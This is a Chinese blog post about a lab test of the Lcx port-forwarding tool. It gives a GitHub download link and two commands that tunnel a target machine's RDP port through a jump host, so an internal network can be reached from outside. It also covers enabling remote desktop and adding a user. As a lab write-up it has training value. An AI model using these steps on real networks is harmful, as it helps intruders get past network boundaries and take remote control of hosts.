lcx端口转发linux_Lcx端口转发初探

6007bce3b57e4fc51c927d5489a08fdc.png

最近写了一个简单的威胁分析专家系统Gui图形界面工具,可以快速判断失陷主机,给出失陷隶属度,非常人性化,压缩包大小有20M。实际上,这个小工具可以帮助一线驻场人员,快速定位高危主机,并给所有主机进行威胁排名,指导现场进行威胁处置。采用多维度的打分算法,是整个系统的关键,也花了一点时间来调参。看着自己的小工具,还是蛮有成就感的,我准备明年写一点小游戏,这样大家都能体验我的开发成果~


实际上关于Lcx的文章非常多,但是却没有一个人告诉你Lcx在哪里下载,为什么呢?因为Lcx腾讯管家等主流杀毒软件会报告是病毒,虽然这个误报,但是主流厂商都报,后来者只好跟着报了,Lcx就是为了端口转发的。通过Lcx可以解决数据流的单边问题,比如公司内网可以访问外网,但是外网不可以访问内网,通过Lcx就可以实现从外网访问内网,打破单边网络实现对内网的控制。

Lcx的Github下载地址如下,实际上网上有很多不同版本,但是Github上的是最安全的。

https://github.com/UndefinedIdentifier/LCX

步骤一:在目标机器上执行反射操作,反射到跳板机

Lcx.exe -slave 192.168.160.139 4444 127.0.0.1 3389

18f280716c1315cb4a5b98687d7533cc.png

步骤二:在跳板机上接收,即将3389端口映射成5555端口

Lcx.exe -listen 4444 5555

daa039c66556f5ed3ab1b0e44d7acfc2.png

步骤三:在跳板机上通过5555端口建立到目标机器上的远程连接

0aad67f911ec50d4dbba0eaa280e37b4.png

步骤四:见证奇迹,真的不容易,进程不稳定

  • 终于成功啦~
  • 多了一个用户登陆了(AILX00-Win7ailx00)
  • 图中的第三个就是啦~

5888da8d21d7aeaddfa8c83ebbe0bd88.png
  • 远程登陆到非域账号的ailx00账户~
  • 桌面干干净净的啥也没有~

8701d25ca9dc0eda1cedb5ab5bb36a74.png

有的人感觉很简单,实际上看起来简单,实战的时候,就会感觉时间流逝的飞快。其中冷暖,实验自知,我大概经历了10多次的失败尝试,终于爽了一把,转眼一看,已经12点半了,还好是周末,赶紧睡觉,身体要紧~

  • 登陆域账号的时候,各种出错

078f1efe05cb2be3b6a3105192fc9c70.png
  • 登陆非域账号的时候,出现这个是正常的,也预示着实验的成功

9195e94ca220fbea3ff095917c2668ef.png
  • 由于我的靶机的远程没有开放,导致没有成功
  • 在计算机属性里面配置一下,允许远程连接
  • 虽然这个操作较不安全,但是作为试验演示是一个很不错的方法

db4c56722963c0085ffa8c01ed75c28a.png
  • 由于刚刚开始不知道里面有一个ailx00非域账号,所以添加了一个新的用户ailx0001
  • 因为不是域账号,所以登陆的时候,需要使用计算机名代替域名
  • 这里需要注意一样,很容易搞错

5e25c5a9b558861f845b731e1ba82d2e.png
  • 爽了一把之后
  • 当我再次准备实验的时候
  • 发现在目标机器上的Lcx已经被删除了
  • 是腾讯干的
  • 就算我关闭了腾讯电脑管家
  • 它还是悄悄的把我文件删了
  • 腾讯其实偷偷在内核态运行

本篇完。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值